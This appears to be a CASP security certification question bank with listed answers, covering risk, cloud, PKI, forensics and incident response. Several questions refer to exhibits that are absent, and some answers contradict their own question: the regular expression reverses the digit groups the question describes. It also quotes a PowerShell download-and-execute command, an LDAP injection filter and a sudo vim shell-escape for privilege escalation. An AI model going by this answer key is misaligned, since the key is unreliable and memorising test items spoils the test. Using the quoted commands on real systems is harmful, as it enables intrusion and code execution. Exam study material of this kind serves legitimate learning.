CASP (201-300)
A company invested a total of $10 million for a new storage solution installed across five on-site datacenters. Fifty percent of the cost of this investment was for solid-state storage. Due to the high rate of wear on this storage, the company is estimating that 5% will need to be replaced per year. Which of the following is the ALE due to storage replacement?
$250,000
A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment. Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant?
A jump box in the screened subnet
An organization developed a social media application that is used by customers in multiple remote geographic locations around the world. The organization's headquarters and only datacenter are located in New York City. The Chief Information Security Officer wants to ensure the following requirements are met for the social media application: • Low latency for all mobile users to improve the users' experience • SSL offloading to improve web server performance • Protection against DoS and DDoS attacks • High availability Which of the following should the organization implement to BEST ensure all requirements are met?
A load-balanced group of reverse proxy servers with SSL acceleration
A company undergoing digital transformation is reviewing the resiliency of a CSP and is concerned about meeting SLA requirements in the event of a CSP incident. Which of the following would be BEST to proceed with the transformation?
A multicloud provider solution
An organization is assessing the security posture of a new SaaS CRM system that handles sensitive PII and identity information, such as passport numbers. The SaaS CRM system does not meet the organization's current security standards. Post remediation work, the assessment recorded the following: 1. There will be a $20.000 per day revenue loss for each day the system is delayed going into production. 2. The inherent risk was high. 3. The residual risk is now low. 4. The solution rollout to the contact center will be a staged deployment. Which of the following risk-handling techniques will BEST meet the organization's requirements post remediation?
Accept the risk, as compensating controls have been implemented to manage the risk.
A security administrator configured the account policies per security implementation guidelines. However, the accounts still appear to be susceptible to brute-force attacks. The following settings meet the existing compliance guidelines: • Must have a minimum of 15 characters • Must use one number • Must use one capital letter • Must not be one of the last 12 passwords used Which of the following policies should be added to provide additional security?
Account lockout
An organization is prioritizing efforts to remediate or mitigate risks identified during the latest assessment. For one of the risks, a full remediation was not possible, but the organization was able to successfully apply mitigations to reduce the likelihood of impact. Which of the following should the organization perform NEXT?
Assess the residual risk.
A company has moved its sensitive workloads to the cloud and needs to ensure high availability and resiliency of its web-based application. The cloud architecture team was given the following requirements: • The application must run at 70% capacity at all times • The application must sustain DoS and DDoS attacks. • Services must recover automatically. Which of the following should the cloud architecture team implement? (Choose three.)
CDN, WAF, and Autoscaling
A vulnerability assessment endpoint generated a report of the latest findings. A security analyst needs to review the report and create a priority list of items that must be addressed. Which of the following should the analyst use to create the list quickly?
CVSS Scores
A developer is creating a new mobile application for a company. The application uses REST API and TLS 1.2 to communicate securely with the external back-end server. Due to this configuration, the company is concerned about HTTPS interception attacks. Which of the following would be the BEST solution against this type of attack?
Certificate pinning
A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user's actions. An investigator took a forensic image of the VM and downloaded the image to a secured USB drive to share with the government. Which of the following should be taken into consideration during the process of releasing the drive to the government?
Chain of Custody
A forensic investigator started the process of gathering evidence on a laptop in response to an incident. The investigator took a snapshot of the hard drive, copied relevant log files, and then performed a memory dump. Which of the following steps in the process should have occurred FIRST?
Collect the most volatile data.
A business wants to migrate its workloads from an exclusively on-premises IT infrastructure to the cloud but cannot implement all the required controls. Which of the following BEST describes the risk associated with this implementation?
Compliance risk
A company created an external application for its customers. A security researcher now reports that the application has a serious LDAP injection vulnerability that could be leveraged to bypass authentication and authorization. Which of the following actions would BEST resolve the issue? (Choose two.)
Conduct input sanitization and deploy a WAF.
A security analyst notices a number of SIEM events that show the following activity: Which of the following response actions should the analyst take FIRST?
Configure the forward proxy to block 40.90.23.154.
A cloud engineer is tasked with improving the responsiveness and security of a company's cloud-based web application. The company is concerned that international users will experience increased latency. Which of the following is the BEST technology to mitigate this concern?
Content delivery network
A security analyst is performing a vulnerability assessment on behalf of a client. The analyst must define what constitutes a risk to the organization. Which of the following should be the analyst's FIRST action?
Create a full inventory of information and data assets.
A security researcher has been given an executable that was captured by a honeypot. Which of the following should the security researcher implement to test the executable?
DAST (Dynamic Application Security Testing)
An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment's notice. Which of the following should the organization consider FIRST to address this requirement?
Design an appropriate warm site for business continuity.
An analyst received a list of IOCs from a government agency. The attack has the following characteristics: 1. The attack starts with bulk phishing. 2. If a user clicks on the link, a dropper is downloaded to the computer. 3. Each of the malware samples has unique hashes tied to the user. The analyst needs to identify whether existing endpoint controls are effective. Which of the following risk mitigation techniques should the analyst use?
Detonate in a sandbox
A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell IEX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois Which of the following security controls would have alerted and prevented the next phase of the attack?
EDR and application approved list
An organization decided to begin issuing corporate mobile device users microSD HSMs that must be installed in the mobile devices in order to access corporate resources remotely. Which of the following features of these devices MOST likely led to this decision? (Choose two.)
Embedded cyptoprocessor & Hardware-backed public key storage
Company A acquired Company B. During an initial assessment, the companies discover they are using the same SSO system. To help users with the transition. Company A is requiring the following: • Before the merger is complete, users from both companies should use a single set of usernames and passwords. • Users in the same departments should have the same set of rights and privileges, but they should have different sets of rights and privileges if they have different IPs. • Users from Company B should be able to access Company A's available resources. Which of the following are the BEST solutions? (Choose two.)
Establishing one-way trust from Company B to Company A and Enabling SAML
Which of the following is a risk associated with SDN?
Expanded attack surface
In order to authenticate employees who, call in remotely, a company's help desk staff must be able to view partial information about employees because the full information may be considered sensitive. Which of the following solutions should be implemented to authenticate employees?
Field masking
Which of the following is required for an organization to meet the ISO 27018 standard?
GDPR equivalent standards must be met
An architect is designing security scheme for an organization that is concerned about APTs. Any proposed architecture must meet the following requirements: • Services must be able to be reconstituted quickly from a known-good state. • Network services must be designed to ensure multiple diverse layers of redundancy. • Defensive and responsive actions must be automated to reduce human operator demands. Which of the following designs must be considered to ensure the architect meets these requirements? (Choose three.)
Geographic distribution of critical data and services, hardened and verified container usage and establishment of warm and hot sites for continuity of operations
A server in a manufacturing environment is running an end-of-life operating system. The vulnerability management team is recommending that the server be upgraded to a supported operating system, but the ICS software running on the server is not compatible with modem operating systems. Which of the following compensating controls should be implemented to BEST protect the server?
HIPS
A security architect updated the security policy to require a proper way to verify that packets received between two parties have not been tampered with and the connection remains private. Which of the following cryptographic techniques can be used to ensure the security policy is being enforced properly?
HMAC_SHA256
A cloud security architect has been tasked with finding a solution for hardening VMs. The solution must meet the following requirements: • Data needs to be stored outside of the VMs. • No unauthorized modifications to the VMs are allowed. • If a change needs to be done, a new VM needs to be deployed. Which of the following is the BEST solution?
Immutable system
A high-severity vulnerability was found on a web application and introduced to the enterprise. The vulnerability could allow an unauthorized user to utilize an open- source library to view privileged user information. The enterprise is unwilling to accept the risk, but the developers cannot fix the issue right away. Which of the following should be implemented to reduce the risk to an acceptable level until the issue can be fixed?
Implement MFA, review the application logs, and deploy a WAF
A large healthcare provider utilizes loT devices to monitor patients' heart rhythms. Which of the following is the BEST way to ensure that data collected from the loT devices is protected from unauthorized access?
Implement SSL/TLS for the data in transit.
A security analyst at a global financial firm was reviewing the design of a cloud-based system to identify opportunities to improve the security of the architecture. The system was recently involved in a data breach after a vulnerability was exploited within a virtual machine's operating system. The analyst observed the VPC in which the system was located was not peered with the security VPC that contained the centralized vulnerability scanner due to the cloud provider's limitations. Which of the following is the BEST course of action to help prevent this situation in the near future?
Implement a centralized network gateway to bridge network traffic between all VPCs
After a security incident, a network security engineer discovers that a portion of the company's sensitive external traffic has been redirected through a secondary ISP that is not normally used. Which of the following would BEST secure the routes while allowing the network to function in the event of a single provider failure?
Implement an inbound BGP prefix list
A company wants to securely manage the APIs that were developed for its in-house applications. Previous penetration tests revealed that developers were embedding unencrypted passwords in the code. Which of the following can the company do to address this finding? (Choose two.)
Implement complex, key-length API key management and Incorporate a DAST into the DevSecOps process to identify the exposure of secrets.
A software company decides to study and implement some new security features in the software it develops in C++ language. Developers are trying to find a way to avoid a malicious process that can access another process's execution area. Which of the following techniques can the developers do?
Implement memory encryption
A company hosts a large amount of data in blob storage for its customers. The company recently had a number of issues with this data being prematurely deleted before the scheduled backup processes could be completed. The management team has asked the security architect for a recommendation that allows blobs to be deleted occasionally, but only after a successful backup. Which of the following solutions will BEST meet this requirement?
Implement soft delete for blobs.
An organization offers SaaS services through a public email and storage provider. To facilitate password resets, a simple online system is set up. During a routine check of the storage each month, a significant increase in use of storage can be seen. Which of the following techniques would remediate the attack?
Implementing a new password reset system
A significant weather event caused all systems to fail over to the disaster recovery site successfully. However, successful data replication has not occurred in the last six months, which has resulted in the service being unavailable. Which of the following would BEST prevent this scenario form happening again?
Implementing scheduled, full interruption tests
A security analyst discovered that the company's WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests: Which of the following would BEST mitigate this vulnerability?
Input validation
A security analyst discovered that the company's WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests: (&(objectClass=*)(objectClass=*))(&(objectClass=void)(type=admin)) Which of the following would BEST mitigate this vulnerability?
Input validation
A software assurance analyst reviews an SSH daemon's source code and sees the following: Based on this code snippet, which of the following attacks is MOST likely to succeed?
Integer overflow
A host on a company's network has been infected by a worm that appears to be spreading via SMB. A security analyst has been tasked with containing the incident while also maintaining evidence for a subsequent investigation and malware analysis. Which of the following steps would be best to perform FIRST?
Isolate the infected host from the network by removing all network connections.
Which of the following terms refers to the delivery of encryption keys to a CASB or a third-party entity?
Key Distribution
A company has hired a third party to develop software as part of its strategy to be quicker to market. The company's policy outlines the following requirements: ✑ The credentials used to publish production software to the container registry should be stored in a secure location. ✑ Access should be restricted to the pipeline service account, without the ability for the third-party developer to read the credentials directly. Which of the following would be the BEST recommendation for storing and monitoring access to these shared credentials?
Key Vault
The Chief Information Officer (CIO) wants to implement enterprise mobility throughout the organization. The goal is to allow employees access to company resources. However, the CIO wants the ability to enforce configuration settings, manage data, and manage both company-owned and personal devices. Which of the following should the CIO implement to achieve this goal?
MDM
Which of the following is the MOST important cloud-specific risk from the CSP's viewpoint?
Management plane breach
A company recently acquired a SaaS provider and needs to integrate its platform into the company's existing infrastructure without impact to the customer's experience. The SaaS provider does not have a mature security program. A recent vulnerability scan of the SaaS provider's systems shows multiple critical vulnerabilities attributed to very old and outdated OSs. Which of the following solutions would prevent these vulnerabilities from being introduced into the company's existing infrastructure?
Migrate the services to new systems with a supported and patched OS.
A company is looking to fortify its cybersecurity defenses and is focusing on its network infrastructure. The solution cannot affect the availability of the company's services to ensure false positives do not drop legitimate traffic. Which of the following would satisfy the requirement?
NIDS or Network Intrusion Detection System
A vulnerability analyst identified a zero-day vulnerability in a company's internally developed software. Since the current vulnerability management system does not have any checks for this vulnerability, an engineer has been asked to create one. Which of the following would be BEST suited to meet these requirements?
OVAL
A security architect is implementing a web application that uses a database back end. Prior to production, the architect is concerned about the possibility of XSS attacks and wants to identify security controls that could be put in place to prevent these attacks. Which of the following sources could the architect consult to address this security concern?
OWASP
A software developer created an application for a large, multinational company. The company is concerned the program code could be reverse engineered by a foreign entity and intellectual property would be lost. Which of the following techniques should be used to prevent this situation?
Obfuscation
A software developer is working on a piece of code required by a new software package. The code should use a protocol to verify the validity of a remote identity. Which of the following should the developer implement in the code?
Online Certificate Status Protocol (OCSP).
During a recent security incident investigation, a security analyst mistakenly turned off the infected machine prior to consulting with a forensic analyst. Upon rebooting the machine, a malicious script that was running as a background process was no longer present. As a result, potentially useful evidence was lost. Which of the following should the security analyst have followed?
Order of volatility
A healthcare system recently suffered from a ransomware incident. As a result, the board of directors decided to hire a security consultant to improve existing network security. The security consultant found that the healthcare network was completely flat, had no privileged access limits, and had open RDP access to servers with personal health information. As the consultant builds the remediation plan, which of the following solutions would BEST solve these challenges? (Choose three.)
PAM & Network Segmentation & NAC
A security analyst discovered that a database administrator's workstation was compromised by malware. After examining the logs, the compromised workstation was observed connecting to multiple databases through ODBC. The following query behavior was captured: Assuming this query was used to acquire and exfiltrate data, which of the following types of data was compromised, and what steps should the incident response plan contain?
PAN; Inform the legal department of the breach and look for this data in dark web monitoring.
An organization recently started processing, transmitting, and storing its customers' credit card information. Within a week of doing so, the organization suffered a massive breach that resulted in the exposure of the customers' information. Which of the following provides the BEST guidance for protecting such information while it is at rest and in transit?
PCI DSS
A Chief Information Officer (CIO) wants to implement a cloud solution that will satisfy the following requirements: ✑ Support all phases of the SDLC. ✑ Use tailored website portal software. ✑ Allow the company to build and use its own gateway software. ✑ Utilize its own data management platform. ✑ Continue using agent-based security tools. Which of the following cloud-computing models should the CIO implement?
PaaS" (Platform as a Service)
A security analyst needs to recommend a remediation to the following threat: Which of the following actions should the security analyst propose to prevent this successful exploitation?
Patch the system
A software developer was just informed by the security team that the company's product has several vulnerabilities. Most of these vulnerabilities were traced to code the developer did not write. The developer does not recognize some of the code, as it was in the software before the developer started on the program and is not tracked for licensing purposes. Which of the following would the developer MOST likely do to mitigate the risks and prevent further issues like these from occurring?
Perform software composition analysis and remediate vulnerabilities found in the software.
A home automation company just purchased and installed tools for its SOC to enable incident identification and response on software the company develops. The company would like to prioritize defenses against the following attack scenarios: • Unauthorized insertions into application development environments • Authorized insiders making unauthorized changes to environment configurations Which of the following actions will enable the data feeds needed to detect these types of attacks on development environments? (Choose two.)
Perform static code analysis of committed code and generate summary reports and Monitor dependency management tools and report on susceptible third-party libraries.
Technicians have determined that the current server hardware is outdated, so they have decided to throw it out. Prior to disposal, which of the following is the BEST method to use to ensure no data remnants can be recovered?
Physical Destruction
An organization recently experienced a ransomware attack. The security team leader is concerned about the attack reoccurring. However, no further security measures have been implemented. Which of the following processes can be used to identify potential prevention recommendations?
Preparation
An organization is looking to establish more robust security measures by implementing PKI. Which of the following should the security analyst implement when considering mutual authentication?
Public keys on both endpoints
A company wants to harden its network infrastructure and has established the following requirements for its physical network devices: • Active Directory authentication and authorization should be attempted first, but local authentication and authorization is permitted if Active Directory fails or is unavailable. • An event-based authentication factor must be used. • Administrative actions must be logged. Which of the following should the company implement to meet the requirements? (Select TWO).
RADIUS E. TACACS+
A MSSP has taken on a large client that has government compliance requirements. Due to the sensitive nature of communications to its aerospace partners, the MSSP must ensure that all communications to and from the client web portal are secured by industry-standard asymmetric encryption methods. Which of the following should the MSSP configure to BEST meet this objective?
RSA (Rivest-Shamir-Adleman)
An auditor needs to scan documents at rest for sensitive text. These documents contain both text and images. Which of the following software functionalities must be enabled in the DLP solution for the auditor to be able to fully read these documents? (Choose two.)
Regular expression pattern matching and Optical character recognition functionality
A company launched a new service and created a landing page within its website network for users to access the service. Per company policy, all websites must utilize encryption for any authentication pages. A junior network administrator proceeded to use an outdated procedure to order new certificates. Afterward, customers are reporting the following error when accessing a new web page: NET:ERR_CERT_COMMON_NAME_INVALID. Which of the following BEST describes what the administrator should do NEXT?
Request a new certificate with the correct subject alternative name that includes the new websites.
A security architect is given the following requirements to secure a rapidly changing enterprise with an increasingly distributed and remote workforce: ✑ Cloud-delivered services ✑ Full network security stack ✑ SaaS application security management ✑ Minimal latency for an optimal user experience ✑ Integration with the cloud IAM platform Which of the following is the BEST solution?
SASE (Secure Access Service Edge)
Given the following log snippet from a web server: Which of the following BEST describes this type of attack?
SQL Injection
A firewall administrator needs to ensure all traffic across the company network is inspected. The administrator gathers data and finds the following information regarding the typical traffic in the network: Which of the following is the BEST solution to ensure the administrator can complete the assigned task?
SSL/TLS decryption
A security administrator sees several hundred entries in a web server security log that are similar to the following: Staten Island, New York, United States was blocked 10 minutes for exceeding the maximum requests per minute at URL https://companysite.net/xmlrpc.php 6/7/202110:05:15 AM, IP: 151.205.188.74 Hostname: pool-151.205.188.74-nycmny.isp.net Status: 503 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/90.0.44 Safari/537.36 WHOIS: ISP.net (NET-151-196-0-0-1) 151.196.0.0 - 151.205.255.255 The network source varies, but the URL, status, and user agent are the same. Which of the following would BEST protect the web server without blocking legitimate traffic?
Script the daily collection of the WHOIS ranges to add to the WAF as a denied ACL.
A security architect is analyzing an old application that is not covered for maintenance anymore because the software company is no longer in business. Which of the following techniques should have been implemented to prevent these types of risks?
Source code escrows
During a system penetration test, a security engineer successfully gained access to a shell on a Linux host as a standard user and wants to elevate the privilege levels. Which of the following is a valid Linux post-exploitation method to use to accomplish this goal?
Spawn a shell using sudo and an escape string such as sudo vim -c '!sh'.
A security analyst just identified an increase in the amount of corporate traffic containing media in the last 24 hours. Which of the following describes the method used to identify messages potentially hidden in the media files?
Steganalysis is the method used to identify messages or hidden data within media files, such as images, audio, or video files
An organization has an operational requirement with a specific equipment vendor. The organization is located in the United States, but the vendor is located in another region. Which of the following risks would be MOST concerning to the organization in the event of equipment failure?
Support may not be available during all business hours.
A global organization's Chief Information Security Officer (CISO) has been asked to analyze the risks involved in a plan to move the organization's current MPLS-based WAN network to use commodity internet and SD-WAN hardware. The SD-WAN provider is currently highly regarded but is a regional provider. Which of the following is MOST likely identified as a potential risk by the CISO?
The SD-WAN provider may not be able to support the required troubleshooting and maintenance.
A new web server must comply with new secure-by-design principles and PCI DSS. This includes mitigating the risk of an on-path attack. A security analyst is reviewing the following web server configuration: Which of the following ciphers should the security analyst remove to support the business requirements?
The TLS_DHE_DSS_WITH_RC4_128_SHA cipher should be removed from the web server configuration since it uses the insecure RC4 encryption algorithm, which is vulnerable to on-path attacks
A client is adding scope to a project. Which of the following processes should be used when requesting updates or corrections to the client's systems?
The change control board must review and approve a submission.
A penetration tester is testing a company's login form for a web application using a list of known usernames and a common password list. According to a brute-force utility, the penetration tester needs to provide the tool with the proper headers, POST URL with variable names, and the error string returned with an improper login. Which of the following would BEST help the tester to gather this information? (Choose two.)
The inspect feature from the web browser and An HTTP interceptor
A security analyst is evaluating the security of an online customer banking system. The analyst has a 12-character password for the test account. At the login screen, the analyst is asked to enter the third, eighth, and eleventh characters of the password. Which of the following describes why this request is a security concern? (Choose two.)
The request is evidence that the password is more open to being captured via a keylogger & The request proves a potential attacker only needs to be able to guess or brute force three characters rather than 12 characters of the password.
A business stores personal client data of individuals residing in the EU in order to process requests for mortgage loan approvals. Which of the following does the business's IT manager need to consider?
The right to personal data erasure.
A recent security audit identified multiple endpoints have the following vulnerabilities: • Various unsecured open ports • Active accounts for terminated personnel • Endpoint protection software with legacy versions • Overly permissive access rules Which of the following would BEST mitigate these risks? (Choose three).
Unneeded services disabled, Patching and Removal of unused accounts:
A security architect works for a manufacturing organization that has many different branch offices. The architect is looking for a way to reduce traffic and ensure the branch offices receive the latest copy of revoked certificates issued by the CA at the organization's headquarters location. The solution must also have the lowest power requirement on the CA. Which of the following is the BEST solution?
Use Delta CRLs at the branches.
A security architect for a manufacturing company must ensure that a new acquisition of IoT devices is securely integrated into the company's Infrastructure. The devices should not directly communicate with other endpoints on the network and must be subject to network traffic monitoring to identify anomalous traffic. Which of the following would be the BEST solution to meet these requirements?
Use a separate VLAN with an ACL and implement network detection and response.
A company would like to obfuscate PII data accessed by an application that is housed in a database to prevent unauthorized viewing. Which of the following should the company do to accomplish this goal?
Use cell-level encryption
A security engineer thinks the development team has been hard-coding sensitive environment variables in its code. Which of the following would BEST secure the company's CI/CD pipeline?
Utilizing a trusted secrets manager
A company plans to build an entirely remote workforce that utilizes a cloud-based infrastructure. The Chief Information Security Officer asks the security engineer to design connectivity to meet the following requirements: ✑ Only users with corporate-owned devices can directly access servers hosted by the cloud provider. ✑ The company can control what SaaS applications each individual user can access. ✑ User browser activity can be monitored. Which of the following solutions would BEST meet these requirements?
VPN, CASB, and secure web gateway
Which of the following communication protocols is used to create PANS with small, low-power digital radios and supports a large number of nodes?
Zigbee is a communication protocol that is used to create Personal Area Networks (PANs) with small, low-power digital radios
A security analyst is reviewing a new IOC in which data is injected into an online process. The IOC shows the data injection could happen in the following ways: • Five numerical digits followed by a dash, followed by four numerical digits, or • Five numerical digits When one of these IOCS is identified, the online process stops working. Which of the following regular expressions should be implemented in the NIPS?
^\d{4}(-\d{5})?$
In comparison to other types of alternative processing sites that may be invoked as a part of disaster recovery, cold sites are different because they:
are geographically separated from the company's primary facilities.
A company that is operating a Unix legacy system is concerned about the strength of the system's password settings. The legacy system does not allow passwords that are longer than eight characters; therefore, the system has been configured to only accept passwords that are exactly eight characters long. Which of the following will work BEST to strengthen the stored passwords against off-line password cracking for this system?
bcrypt is the best choice to strengthen the stored passwords against off-line password cracking for the given Unix legacy system.
An employee's device was missing for 96 hours before being reported. The employee called the help desk to ask for another device. Which of the following phases of the incident response cycle needs improvement?
containment
A shipping company that is trying to eliminate entire classes of threats is developing an SELinux policy to ensure its custom Android devices are used exclusively for package tracking. After compiling and implementing the policy, in which of the following modes must the company ensure the devices are configured to run?
enforcing
A security engineer based in Iceland works in an environment requiring an on-premises and cloud-based storage solution. The solution should take into consideration the following: 1. The company has sensitive data. 2. The company has proprietary data. 3. The company has its headquarters in Iceland, and the data must always reside in that country. Which cloud deployment model should be used?
hybrid cloud
An organization is researching the automation capabilities for systems within an OT network. A security analyst wants to assist with creating secure coding practices and would like to learn about the programming languages used on the PLCs. Which of the following programming languages is the MOST relevant for PLCs?
ladder logic
A security engineer needs to implement a CASB to secure employee user web traffic. A key requirement is that the relevant event data must be collected from existing on-premises infrastructure components and consumed by the CASB to expand traffic visibility. The solution must be highly resilient to network outages. Which of the following architectural components would BEST meet these requirements?
log collection
The principal security analyst for a global manufacturer is investigating a security incident related to abnormal behavior in the ICS network. A controller was restarted as part of the troubleshooting process, and the following issue was identified when the controller was restarted: SECURE BOOT FAILED: FIRMWARE MISMATCH EXPECTED 0xFDC479 ACTUAL 0x79F31B During the investigation, this modified firmware version was identified on several other controllers at the site. The official vendor firmware versions do not have this checksum. Which of the following stages of the MITRE ATT&CK framework for ICS includes this technique?
persistence
Signed applications reduce risks by:
providing assurance that the application is using unmodified source code
A startup software company recently updated its development strategy to incorporate the Software Development Life Cycle, including revamping the quality assurance and release processes for gold builds. Which of the following would most likely be developed FIRST as part of the overall strategy?
security requirements
